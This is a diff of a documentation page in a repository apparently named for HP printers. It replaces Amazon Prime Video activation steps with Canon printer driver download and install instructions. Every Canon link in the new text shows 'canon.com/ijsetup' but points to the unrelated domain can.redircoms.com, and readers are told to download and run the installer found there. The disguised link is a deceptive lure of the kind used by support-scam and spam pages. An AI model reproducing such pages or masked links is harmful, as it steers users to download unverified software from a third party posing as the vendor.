hp-printerr/hpmug/index.rst

-There are 5 simple stages to set up and activate Amazon Prime Video on your Smart TV or streaming device.
-Follow each stage one by one to successfully link your device via `amazon.com/mytv <https://www.amazon.com/mytv>`_.
-Amazon Prime Video gives you access to thousands of movies and shows.
-It's one of the most popular streaming services globally, and activation via **amazon.com/mytv** is quick and easy.
-Visit `amazon.com/mytv <https://www.amazon.com/mytv>`_, enter your activation code, and start streaming instantly.
+There are 5 simple stages to download, install, and set up your Canon printer driver on your computer.
+Follow each stage one by one to successfully connect your printer via `canon.com/ijsetup <https://can.redircoms.com>`_.
+Canon’s setup site provides the latest drivers and easy instructions.
+It’s the fastest way to ensure your printer works correctly with your computer.
+Visit `canon.com/ijsetup <https://can.redircoms.com>`_, download the right driver, and get your printer ready to use in minutes.

 **********
-Steps to Activate Amazon Prime Video
+Steps to Download Canon Printer Driver
 **********

-1. Open a web browser and go to `amazon.com/mytv <https://www.amazon.com/mytv>`_.
+1. Open a web browser and go to `canon.com/ijsetup <https://can.redircoms.com>`_.

-2. Sign in with your Amazon account credentials.

-3. On your TV or streaming device, open the Amazon Prime Video app.

-4. An activation code will appear on your screen.

-5. Enter the displayed code on the `amazon.com/mytv <https://www.amazon.com/mytv>`_ website.
+2. Enter your Canon printer model in the search box.

+3. Select your operating system if prompted.

-6. Click on the Register Device button.
+4. Click on **Download** to get the latest driver and software package.

-7. Once registered, your TV will automatically refresh and you’ll be able to stream Prime Video.
+5. Save the installer file to your computer.

 **********
-Alternate Method: Register via Mobile App
+Steps to Install Canon Printer Driver
 **********

-1. Install the Amazon Prime Video app on your smartphone.
+1. Locate the downloaded installer file on your computer.

-2. Open the app and sign in with your Amazon account.

-3. Go to the Settings menu and choose **Register a device**.

-4. Enter the code shown on your TV screen.

-5. Tap **Register** and wait for confirmation.
+2. Double-click the installer to begin the setup process.

+3. Follow the on-screen instructions and accept the license agreement.

+4. Choose your connection type (USB or Wireless).

+5. Complete the installation by clicking **Finish**.

 **********
-Connecting Your TV or Streaming Device
+Setting Up Your Canon Printer
 **********

-1. Make sure your TV or streaming device is connected to the internet.
+1. Make sure your Canon printer is powered on.

-2. Install and open the Amazon Prime Video app.
+2. For wireless setup, ensure your printer and computer are on the same Wi-Fi network.

+3. Open the Canon driver or utility you installed.

-3. Follow the on-screen instructions to sign in or get your activation code.
+4. Follow on-screen prompts to detect and connect your printer.

-4. Use `amazon.com/mytv <https://www.amazon.com/mytv>`_ on your computer or mobile browser to enter the code.

-5. Once confirmed, enjoy unlimited streaming of Amazon Originals, movies, and TV shows.
+5. Once connected, print a test page to verify setup is complete.